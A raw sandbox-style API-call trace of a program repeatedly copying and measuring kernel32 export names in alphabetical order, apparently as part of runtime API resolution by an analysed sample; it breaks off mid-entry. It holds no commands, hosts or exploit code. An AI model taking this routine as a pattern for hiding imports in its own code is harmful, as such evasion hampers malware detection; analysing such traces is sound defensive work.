lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0179.387] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0179.387] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0179.387] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0179.387] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0179.387] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0179.387] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0179.387] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0179.387] lstrlenA (lpString="BACKUPREAD") returned 10 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0179.387] lstrlenA (lpString="BACKUPSEEK") returned 10 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0179.387] lstrlenA (lpString="BACKUPWRITE") returned 11 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0179.387] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0179.387] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0179.387] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0179.387] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0179.387] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0179.387] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0179.387] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0179.387] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0179.387] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0179.388] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0179.388] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0179.388] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0179.388] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0179.388] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0179.388] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0179.388] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0179.388] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0179.388] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0179.388] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0179.388] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0179.388] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0179.388] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0179.388] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0179.388] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0179.388] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0179.388] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0179.388] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0179.388] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0179.388] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0179.389] lstrlenA (lpString="BEEP") returned 4 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0179.389] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0179.389] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0179.389] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0179.389] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0179.389] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0179.389] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0179.389] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0179.389] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0179.389] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0179.389] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0179.389] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0179.389] lstrlenA (lpString="CANCELIO") returned 8 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0179.389] lstrlenA (lpString="CANCELIOEX") returned 10 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0179.389] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0179.389] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0179.389] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0179.389] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0179.389] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0179.389] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0179.390] lstrlenA (lpString="CHECKELEVATION") returned 14 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0179.390] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0179.390] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0179.390] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0179.390] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0179.390] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0179.390] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0179.390] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0179.390] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0179.390] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0179.390] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0179.390] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0179.390] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0179.390] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0179.390] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0179.390] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0179.390] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0179.390] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0179.390] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0179.391] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0179.391] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0179.391] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0179.391] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0179.391] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0179.391] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0179.391] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0179.391] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0179.391] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0179.391] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0179.391] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0179.391] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0179.391] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0179.391] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0179.391] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0179.391] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0179.391] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0179.391] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0179.391] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0179.391] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0179.392] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0179.392] lstrlenA (lpString="COPYCONTEXT") returned 11 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0179.392] lstrlenA (lpString="COPYFILEA") returned 9 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0179.392] lstrlenA (lpString="COPYFILEEXA") returned 11 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0179.392] lstrlenA (lpString="COPYFILEEXW") returned 11 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0179.392] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0179.392] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0179.392] lstrlenA (lpString="COPYFILEW") returned 9 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0179.392] lstrlenA (lpString="COPYLZFILE") returned 10 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0179.392] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0179.392] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0179.392] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0179.392] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0179.392] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0179.392] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0179.392] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0179.392] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0179.392] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0179.392] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0179.393] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0179.393] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0179.393] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0179.393] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0179.393] lstrlenA (lpString="CREATEEVENTA") returned 12 [0179.393] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0179.393] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0179.393] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0179.393] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0179.393] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0179.393] lstrlenA (lpString="CREATEEVENTW") returned 12 [0179.393] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0179.393] lstrlenA (lpString="CREATEFIBER") returned 11 [0179.393] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0179.393] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0179.393] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0179.393] lstrlenA (lpString="CREATEFILEA") returned 11 [0179.393] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0179.394] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0179.394] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0179.394] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0179.394] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0179.394] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0179.394] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") 